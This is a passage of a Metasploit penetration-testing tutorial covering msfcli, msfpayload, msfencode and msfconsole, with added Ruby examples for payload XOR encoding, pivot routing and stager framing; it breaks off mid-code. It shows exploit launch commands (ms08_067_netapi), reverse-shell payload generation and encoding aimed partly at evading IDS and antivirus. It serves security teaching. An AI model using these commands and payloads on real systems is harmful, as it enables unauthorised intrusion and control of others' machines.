
Dejan Lukan evangeline.eleanor@gmail.com

Contents
1 The Metasploit Architecture
1.1 Msfcli
1.2 Msfweb
1.3 Msfpayload
1.4 Msfencode
1.5 Msfconsole
1.5.1 The back command
1.5.2 The check command
1.5.3 The connect command
1.5.4 The exploit command
1.5.5 The irb command
1.5.6 The jobs command
1.5.7 The load command
1.5.8 The unload command
1.5.9 The loadpath command
1.5.10 The resource command
1.5.11 The route command
1.5.12 The info command
1.5.13 The use command
1.5.14 The set command
1.5.15 The unset command
1.5.16 The sessions command
1.5.17 The search command
1.5.18 The show command
1.5.19 The setg and unsetg command
1.6 Exploits
1.6.1 Active Exploits
1.6.2 Passive Exploits
1.6.3 Using Exploits
1.7 Payloads
1.7.1 Generating Payloads
2 Information Gathering
2.1 The Dradis Framework
2.2 Configuring Databases
2.3 Port Scanning
2.3.1 Importing Nmap Results into Metasploit
2.3.2 Nmap: The TCP Idle Scan
2.3.3 Metasploit Port Scanning
2.4 Targeted Scanning
2.4.1 Hunting for SMB
2.4.2 Hunting for MSSQL
2.4.3 Hunting for SSH
2.4.4 Hunting for FTP
2.4.5 SNMP Sweeping
2.4.6 Password Sniffing
2.5 Writing Your Own TCP Scanner
3 Vulnerability Scanning
3.1 Useful Commands
3.2 Nexpose
3.2.1 Scanning the Target Network
3.2.2 Nexpose in MSFConsole
3.3 Nessus
3.3.1 Installation and Configuration
3.3.2 Using Nessus
3.3.3 Importing Results Into the Metasploit
3.3.4 Scanning With Nessus From Metasploit
3.4 OpenVas
3.4.1 Gentoo Linux
3.4.2 Backtrack Linux
3.4.3 Administration
3.4.4 Configuration
3.5 Specialty Vulnerability Scanners
3.5.1 SMB Scanning
3.5.2 VNC Authentication
3.5.3 Open X11
3.5.4 WMAP Web Scanner
3.5.5 Autopwning
4 Meterpreter
4.1 Introduction
4.2 Meterpreter Commands
4.3 Doing interesting things with meterpreter
4.3.1 Capturing Keystrokes
4.3.2 Dumping Usernames and Passwords
4.3.3 Privilege Escalation
4.3.4 Token Impersonation
4.3.5 Pivoting onto Other Systems
4.3.6 Using Meterpreter Scripts
4.4 Meterpreter Scripting
5 Beyond Metasploit
5.1 Armitage
5.2 Social Engineering Toolkit - SET
5.2.1 Spear-Phishing Attack Vector
5.2.2 Teensy USB HID Attack Vector

1 The Metasploit Architecture


The architecture diagram (not reproduced here) shows that there are many different interfaces to the Metasploit framework. The ones covered in this chapter are msfcli, msfweb, msfpayload, msfencode and msfconsole.

1.1 Msfcli
Msfcli is a command line interface to the framework. It runs directly from the command line, so you can redirect input into and output out of msfcli like any other tool. Msfcli is convenient when testing modules or developing new exploits for the framework, and it is a very good tool when you know exactly which exploit and options you need.

# msfcli3.7 -h
Usage: /usr/bin/msfcli3.7 <exploit_name> <option=value> [mode]
==============================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

So the syntax of msfcli is:

msfcli3.7 <exploit_name> <option=value> [mode]

An example of running msfcli with an exploit and its options is:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.201 PAYLOAD=windows/shell/bind_tcp E

If you aren't sure which (O)ptions belong to a particular module, append O to the command:

# msfcli windows/smb/ms08_067_netapi O

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

We can see that the module requires three options: RHOST, RPORT and SMBPIPE. RPORT and SMBPIPE already have defaults, so only RHOST must be supplied. The (A)dvanced mode lists the advanced options on top of these. To see which targets the chosen exploit supports, append T to the command:

# msfcli windows/smb/ms08_067_netapi T

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   ...

To display the payloads that are available to the current module, append P to the command:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.1 P

When we have the final command, we execute the exploit with the E argument:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.1 PAYLOAD=windows/shell/bind_tcp E

Msfcli is useful for specific tasks and convenient for testing and developing new exploits. It's excellent if you know exactly which exploit and options you need.

1.2 Msfweb
Msfweb was an AJAX web interface to the framework, but it has been deprecated and removed from the Metasploit trunk.

1.3 Msfpayload
The msfpayload component of Metasploit allows us to generate shellcode, executables and so on. Shellcode can be emitted in many formats, including C, Ruby, JavaScript and Visual Basic; which output format is best depends on the exploit you are working on.

# msfpayload -h

    Usage: /usr/bin/msfpayload4.0 [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw

OPTIONS:

    -h        Help banner
    -l        List available payloads

If we want to list the required and optional variables for a specific payload, we append the letter O to the arguments:

# msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, none, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

1.4 Msfencode
The shellcode generated by msfpayload is fully functional, but it usually contains null bytes and other "bad characters". A null byte terminates a C string, so if the vulnerable program copies our payload with a string function the copy stops at the first \x00 and the shellcode is truncated before it has been delivered; other bytes (\x0a, \x0d, \x20, ...) are bad for the same reason when the input passes through a line-oriented or URL-decoding parser. In addition, a payload that travels the network in cleartext is likely to be picked up by IDS and antivirus signatures. To address this, Metasploit offers msfencode, which rewrites the payload so that the encoded bytes contain none of the characters you list with -b and prepends a small decoder stub that restores the original in memory on the target.

# msfencode -h

    Usage: /usr/bin/msfencode4.0 <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,mac
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

Metasploit contains a number of different encoders for specific situations. Some are useful when only alphanumeric characters may appear in the payload, while others are general encoders that do well in most situations. We can list all of the encoders with the -l option. The only encoder ranked excellent is x86/shikata_ga_nai, which you should use when in doubt. Keep two things in mind: the decoder stub itself must also be free of the bad characters, so always verify the final output against your bad-character list, and because the stubs of well-known encoders are themselves signatured, encoding alone is not a reliable way past antivirus.

# msfencode -l

Framework Encoders
==================

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
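To make the bad-character problem concrete, here is an added example in Ruby (it is not Metasploit's own encoder code and not part of the original text). It does what the simplest msfencode encoders do: scan a buffer for bad characters, choose a single-byte XOR key under which neither the key nor any encoded byte is a bad character, and decode again to prove the round trip. The sample bytes and the default bad-character list are constructed for the demonstration; the sample is not executable shellcode. It also shows the failure mode a practitioner needs to see: when no single-byte key can avoid the bad characters, the encoder refuses rather than emitting a payload that would be truncated, which is the point at which a multi-byte polymorphic encoder such as x86/shikata_ga_nai is needed.

```ruby
require 'set'

# Added example, not Metasploit's own encoder code: a single-byte XOR
# encoder that chooses its key so that neither the key nor any encoded
# byte falls in the caller's bad-character list, plus the decoder to
# prove the round trip. The default bad-character list is an assumption;
# the real one comes from the target (msfencode -b '\x00\x0a\x0d').
BAD_CHARS_DEFAULT = [0x00, 0x0a, 0x0d].pack('C*').freeze

# Which bad characters occur in buf, as "\xNN" strings, in the order of
# the bad-character list. An empty array means the buffer is clean.
def bad_chars_in(buf, bad = BAD_CHARS_DEFAULT)
  present = buf.bytes.to_set
  bad.bytes.select { |b| present.include?(b) }.map { |b| format('\x%02x', b) }
end

# Smallest key k in 1..255 such that k itself is allowed (the decoder
# stub has to embed it) and b ^ k is allowed for every byte b of buf.
# Returns nil when no such key exists.
def find_xor_key(buf, bad = BAD_CHARS_DEFAULT)
  bad_set = bad.bytes.to_set
  (1..255).find do |k|
    !bad_set.include?(k) && buf.bytes.none? { |b| bad_set.include?(b ^ k) }
  end
end

def xor_bytes(buf, key)
  buf.bytes.map { |b| b ^ key }.pack('C*')
end

# Returns [key, encoded]. Raises when a single-byte XOR cannot avoid the
# bad characters; that is when a multi-byte or polymorphic encoder
# (x86/shikata_ga_nai and friends) is required instead.
def xor_encode(buf, bad = BAD_CHARS_DEFAULT)
  key = find_xor_key(buf, bad)
  unless key
    list = bad.bytes.map { |b| format('\x%02x', b) }.join
    raise ArgumentError, "no single-byte XOR key avoids #{list}"
  end
  [key, xor_bytes(buf, key)]
end

# Decoding is the same XOR. On a real target a decoder stub does this
# in place before jumping to the restored payload, and that stub must
# itself be free of the bad characters.
def xor_decode(encoded, key)
  xor_bytes(encoded, key)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample bytes, not executable shellcode.
  raw = [0x31, 0xc0, 0x50, 0x68, 0x01, 0x0d, 0x0a, 0xff, 0x00].pack('C*')
  puts "bad chars in raw:     #{bad_chars_in(raw).join}"
  key, enc = xor_encode(raw)
  puts format('key: 0x%02x, bad chars in encoded: %s', key, bad_chars_in(enc).inspect)
  puts "round trip ok: #{xor_decode(enc, key) == raw}"
end
```

For the sample buffer the key 0x01 is rejected because the byte 0x01 would encode to 0x00, so the search settles on 0x02. The same check, bad_chars_in, is what you should run over the full msfencode output (stub included) before using it in an exploit.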

The nasm_shell.rb tool can be useful when trying to make sense of assembly code, especially during exploit development when we need the opcode bytes of a given assembly instruction (for example the bytes of a "jmp esp" to search for in a loaded DLL):

# cd /opt/framework-4.0.0/msf3/tools
# ./nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp
nasm >

1.5 Msfconsole
Msfconsole is an interactive command line interface to the framework. It gives access to all of the framework's options, supports command completion and can run external commands. All options of msfconsole can be seen by passing -h to the msfconsole command:

# msfconsole -h
Usage: msfconsole [options]

Specific options:
    -d                               Execute the console as defanged
    -r <filename>                    Execute the specified resource file
    -o <filename>                    Output to the specified file
    -c <filename>                    Load the specified configuration file
    -m <directory>                   Specifies an additional module search path
    -p <plugin>                      Load a plugin on startup
    -y, --yaml <database.yml>        Specify a YAML file containing database settings
    -e <production|development>      Specify the database environment to load from the YAML
          --environment
    -v, --version                    Show version
    -L, --real-readline              Use the system Readline library instead of RbReadline
    -n, --no-database                Disable database support
    -q, --quiet                      Do not print the banner on start up

Common options:
    -h, --help                       Show this message

To launch the console, just execute the msfconsole command:

# msfconsole3.7

                 __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf >

You can display available commands if you enter help at the msf command prompt:

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    makerc        Save commands entered since start to a file
    quit          Exit the console
    reload_all    Reloads all modules from all defined module paths
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Sets a variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers

Msfconsole also supports tab completion, which is really useful because you don't have to remember the exact name and path of the module you wish to use.

1.5.1 The back command


The back command moves out of the current context:

msf exploit(proftp_sreplace) > back
msf >

1.5.2 The check command


The check command can be used to see whether a target is vulnerable to a particular exploit without actually exploiting it. Not many modules implement it, and even when one does the check still sends traffic to the target, so it is not invisible to the other side.

1.5.3 The connect command


The connect command connects to a remote host by IP address (or name) and port from within msfconsole, much as you would with netcat or telnet. With the -s argument it connects over SSL:

msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0

HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/

1.5.4 The exploit command


To launch an exploit, issue the exploit command. For auxiliary modules you can use the run command instead.

1.5.5 The irb command


Running the irb command drops you into a live Ruby interpreter shell, where you can issue commands against the running framework and create Metasploit scripts on the fly:

msf > irb
[*] Starting IRB shell...

>>

1.5.6 The jobs command


Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.

msf > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K        Terminate all running jobs.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate the specified job name.
    -l        List all running jobs.
    -v        Print more detailed info.  Use with -i and -l

msf > jobs

Jobs
====

No active jobs.

msf >

1.5.7 The load command


The load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key=value on the command line. Note in the output below that the pcap_log plugin loads even though the pcaprub library is missing; the plugin will not be able to capture anything until that Ruby library is installed, so read the [-] lines rather than trusting the final "Successfully loaded" message alone.

msf > load pcap_log
[-] MissingSourceFile: no such file to load -- pcaprub
[*] PcapLog plugin loaded.
[*] Successfully loaded plugin: pcap_log
msf >

1.5.8 The unload command


The unload command unloads a previously loaded plugin and removes any commands it added:

msf > unload pcap_log
Unloading plugin pcap_log...unloaded.
msf >

1.5.9 The loadpath command


The loadpath command loads a third-party module tree from the given path, so you can point Metasploit at your own 0day exploits, encoders, payloads and so on. The directory must be laid out like the framework's own modules directory (exploits/, auxiliary/, payloads/, ... with the platform subdirectories underneath); a flat directory of .rb files, as in the example below, yields "Loaded 0 modules".

msf > loadpath /home/secret/modules

Loaded 0 modules.

1.5.10 The resource command


The resource command loads and executes a resource file, a batch of msfconsole commands, one per line. Resource files can greatly speed up testing and development and let you automate many tasks. Let's create a simple one that displays the version of Metasploit:

# echo version > version.rc

And then run it:

msf > resource version.rc
resource (version.rc)> version
Framework: 3.7.0-release.12521
Console  : 3.7.0-release.12467

1.5.11 The route command


The route command routes sockets through a session or comm, which gives basic pivoting: once a route is in place, any module that opens a connection to an address in the routed subnet does so through the session rather than from the attacker's own network stack. To add a route, pass the target subnet and netmask followed by the session (comm) number. The session must be a Meterpreter session, since it is Meterpreter that carries the routed connections.

msf > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf > route add 192.168.1.0 255.255.255.0 2
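To show what the route table actually decides, here is an added example in Ruby; it is not the framework's own Rex::Socket::SwitchBoard code and is not part of the original text. It builds the table that route add/remove maintains (subnet, netmask, comm) and answers the question route get answers: which session, if any, a connection to a given host should go through. The most specific matching route wins and the fallback is Local, exactly as the usage text above says. The session ids are assumed values for the demo.

```ruby
require 'ipaddr'

# Added example, not the framework's own Rex::Socket::SwitchBoard: a
# minimal routing table of the kind "route add <subnet> <netmask> <sid>"
# maintains. comm is the session id the traffic is sent through, or
# :local for the framework's own network stack. Session ids used in the
# demo are assumed values.
Route = Struct.new(:network, :netmask, :comm) do
  # Number of network bits, used to rank routes by specificity.
  def prefix_len
    IPAddr.new(netmask).to_i.to_s(2).count('1')
  end

  def to_s
    "#{network}/#{netmask} via #{comm}"
  end
end

class RouteTable
  def initialize
    @routes = []
  end

  # route add 192.168.1.0 255.255.255.0 2
  # Host bits are masked off so 10.10.10.7/24 and 10.10.10.0/24 are the
  # same route; an identical entry is not added twice.
  def add(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)
    unless @routes.any? { |r| r.network == net && r.netmask == netmask && r.comm == comm }
      @routes << Route.new(net, netmask, comm)
    end
    self
  end

  # route remove 192.168.1.0 255.255.255.0 2 ; returns true if removed
  def remove(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)
    before = @routes.size
    @routes.reject! { |r| r.network == net && r.netmask == netmask && r.comm == comm }
    @routes.size < before
  end

  # route get <host>: the most specific (longest prefix) matching route
  # wins; with no match the default comm is Local, i.e. the socket is
  # opened directly from the attacker's machine.
  def comm_for(host)
    ip = IPAddr.new(host)
    best = @routes.select { |r| r.network.include?(ip) }.max_by(&:prefix_len)
    best ? best.comm : :local
  end

  # route print
  def entries
    @routes.map(&:to_s)
  end
end

if __FILE__ == $PROGRAM_NAME
  rt = RouteTable.new
  rt.add('192.168.1.0', '255.255.255.0', 2).add('10.0.0.0', '255.0.0.0', 3)
  rt.add('10.10.10.0', '255.255.255.0', 4)
  puts rt.entries
  %w[192.168.1.50 10.1.2.3 10.10.10.9 8.8.8.8].each do |h|
    puts "#{h} -> #{rt.comm_for(h)}"
  end
end
```

The longest-prefix rule matters in practice: after pivoting twice you will often have a broad route (10.0.0.0/8 via the first session) and a narrower one (10.10.10.0/24 via a session deeper in the network), and the narrower route must take precedence for hosts it covers.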

1.5.12 The info command


The info command provides detailed information about a particular module, including all options, targets, references and a description.

msf > info dos/windows/smb/ms09_001_write

       Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
     Module: auxiliary/dos/windows/smb/ms09_001_write
    Version: 10394
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  j.v.vallejo <j.v.vallejo@gmail.com>

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  445              yes       Set the SMB service port

1.5.13 The use command


When you want to use a particular module, you select it with the use command. This changes the context to that module, exposing its type-specific commands:

msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options

Module options (auxiliary/dos/windows/smb/ms09_001_write):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

msf auxiliary(ms09_001_write) >

1.5.14 The set command


The set command configures options and parameters for the module you're currently working with:

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

Module options (auxiliary/dos/windows/smb/ms09_001_write):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  445              yes       Set the SMB service port

You can also choose an encoder at runtime, which is very useful in exploit development when you aren't yet sure which payload encoding will work with a given exploit.

msf auxiliary(ms09_001_write) > show encoders

Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Comman
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encode
   cmd/printf_php_mq                        good       printf(1) via PHP magic_quotes Utility Com
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
   x64/xor                                  normal     XOR Encoder
   x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
   x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
   x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encode
   x86/context_time                         manual     time(2)-based Context Keyed Payload Encode
   x86/countdown                            normal     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Enco
   x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                             low        Non-Alpha Encoder
   x86/nonupper                             low        Non-Upper Encoder
   x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                    manual     Single Static Bit
   x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Enco
   x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Enco

msf auxiliary(ms09_001_write) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
msf auxiliary(ms09_001_write) >

1.5.15 The unset command


The unset command removes a parameter previously configured with set. You can remove all assigned variables with "unset all".

msf auxiliary(ms09_001_write) > show options

Module options (auxiliary/dos/windows/smb/ms09_001_write):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  445              yes       Set the SMB service port

msf auxiliary(ms09_001_write) > unset RHOST
Unsetting RHOST...
msf auxiliary(ms09_001_write) > show options

Module options (auxiliary/dos/windows/smb/ms09_001_write):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

1.5.16 The sessions command


The sessions command lets you work with spawned sessions, which can be command shells, Meterpreter sessions, VNC sessions and so on:

msf auxiliary(ms09_001_write) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate session
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -u <opt>  Upgrade a win32 shell to a meterpreter session
    -v

To list the active sessions, use the -l option:

msf > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.101:33191 -> 192.168.1.104:4444

To interact with a given session, you just need to use the -i option followed by the ID number of the session:

msf > sessions -i 1
[*] Starting interaction with 1...

C:\WINDOWS\system32>

1.5.17 The search command


The search command provides regular expression search. The pattern is matched against module names, descriptions, references and so on:

msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...

Auxiliary
=========

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   dos/windows/smb/ms09_001_write                   normal  Microsoft SRV.SYS WriteAndX Invalid D

1.5.18 The show command


The show command with no argument displays every available module in Metasploit:

msf > show

Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Comman
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encode
   cmd/printf_php_mq                        good       printf(1) via PHP magic_quotes Utility Com
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
   x64/xor                                  normal     XOR Encoder
   ...

Valid parameters for the show command are:
- all
- encoders
- nops
- exploits: display all exploits
- payloads: display all payloads for all platforms
- auxiliary: display available auxiliary modules
- targets: display potential targets
- plugins
- options

Additional module-specific parameters are: advanced, evasion, targets, actions.

When you are in the context of a particular module, "show payloads" only displays the payloads that are compatible with that module; for a Windows exploit, for example, Linux payloads are not shown. With a module selected, "show options" displays which settings are available and which are required. If you don't know whether an operating system version is covered by a particular exploit, run "show targets" from within the exploit's context to see which targets are supported. To see the more advanced options, run "show advanced".

1.5.19 The setg and unsetg command


To set a global variable within msfconsole, use the setg command. Once set, these values apply to as many exploits and auxiliary modules as you like:

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136

After setting your variables, you can run the save command to store the current environment and settings. Saved settings are loaded automatically on startup, which saves you from having to set everything again. The unsetg command unsets a global parameter.

1.6 Exploits
Exploits can be divided into two groups:
- active
- passive

1.6.1 Active Exploits

Active exploits attack a specific host, run until completion and then exit.
- bruteforce modules exit when a shell opens on the victim
- module execution stops if an error is encountered
- you can force an active module into the background by passing -j to the exploit command

1.6.2 Passive Exploits


Passive exploits wait for incoming hosts and exploit them as they connect.
- passive exploits almost always target clients such as web browsers, FTP clients and so on
- they can also be used in conjunction with e-mail, waiting for the victims to connect
- passive exploits report shells as sessions, which can be listed (sessions -l) and interacted with (sessions -i)

Example:

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.101:52647 -> 192.168.1.104:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

1.6.3 Using Exploits


Selecting an exploit in Metasploit adds the exploit and check commands to msfconsole:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > help

Exploit Commands
================

    Command       Description
    -------       -----------
    check         Check to see if a target is vulnerable
    exploit       Launch an exploit attempt
    rcheck        Reloads the module and checks if the target is vulnerable
    rexploit      Reloads the module and launches an exploit attempt

msf exploit(ms08_067_netapi) >

There are also multiple show commands available:

> show targets
> show payloads
> show options
> show advanced
> show evasion

1.7 Payloads
There are three types of payload module in Metasploit:
- Singles: standalone payloads that do one thing on their own, for example adding a user to the target system
- Stagers: small payloads that set up a network connection between the attacker and the victim
- Stages: payload components that are downloaded over that connection by the stager; the stages provide the advanced features, with no size limit of their own

Whether a payload is staged is visible in its name: a staged payload separates stage and stager with a slash (windows/shell/bind_tcp), while a single joins them with an underscore (windows/shell_bind_tcp).
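The stager/stage split is easiest to see as a protocol. The Ruby below is an added example (not Metasploit's stager or handler code, and not part of the original text) that plays both ends of a reverse_tcp staging exchange over a local socket pair: the handler frames the stage as a 4-byte little-endian length followed by the stage bytes, and the stager reads the length, refuses absurd sizes, then reads until the whole stage has arrived before it would hand control to it. That framing is what the classic x86 reverse_tcp stager expects; other stagers (reverse_https, for instance) carry the stage differently. The stage bytes are constructed placeholders, not executable code.

```ruby
require 'socket'

# Added example, not Metasploit's own stager or handler code. Models the
# reverse_tcp staging exchange: [4-byte LE length][stage bytes] from the
# handler, read back in full by the stager. Stage contents in the demo
# are constructed placeholders.

# Handler side: serialise the stage the way the classic x86 reverse_tcp
# stager expects it (length prefix, then the body).
def frame_stage(stage)
  [stage.bytesize].pack('V') + stage.b
end

# Stager side: read the length, sanity-check it, then loop until the
# whole stage is in. Short reads are normal on a real network, so one
# recv is never assumed to return everything.
def receive_stage(io, max_size: 16 * 1024 * 1024)
  hdr = io.read(4)
  raise IOError, 'connection closed before the stage length arrived' unless hdr && hdr.bytesize == 4
  len = hdr.unpack1('V')
  raise IOError, "stage length #{len} exceeds limit #{max_size}" if len > max_size
  stage = ''.b
  while stage.bytesize < len
    begin
      stage << io.readpartial(len - stage.bytesize)
    rescue EOFError
      raise IOError, "connection closed after #{stage.bytesize} of #{len} stage bytes"
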